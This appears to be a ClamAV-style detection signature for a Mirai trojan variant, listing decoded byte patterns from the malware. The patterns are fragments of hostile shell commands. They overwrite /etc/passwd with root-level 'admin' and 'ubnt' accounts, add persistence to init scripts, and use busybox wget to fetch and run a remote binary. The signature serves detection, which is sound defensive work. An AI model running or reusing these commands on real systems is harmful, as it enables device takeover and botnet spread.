VIRUS NAME: Unix.Trojan.Mirai-10011919-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: (0|1|2)&(3&4)
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
& echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" >> /etc/init.d/%s && chmod +x /etc/in
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
ips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc/rc.d/clith.sh && chmod +x
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
shell:cd /data/local/tmp; busybox wget http://%d.%d.%d.%d/armv7l; chmod 777 armv7l; ./armv7l; rm -rf armv7l; busybox wget http:/
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
echo "echo \"ubnt:\\\$1\\\$PN1nGGW/\\\$KgZmi3bN1MBJvypq0J8la/:0:0:Administrator:/etc/persistent:/bin/sh\" > /var/e
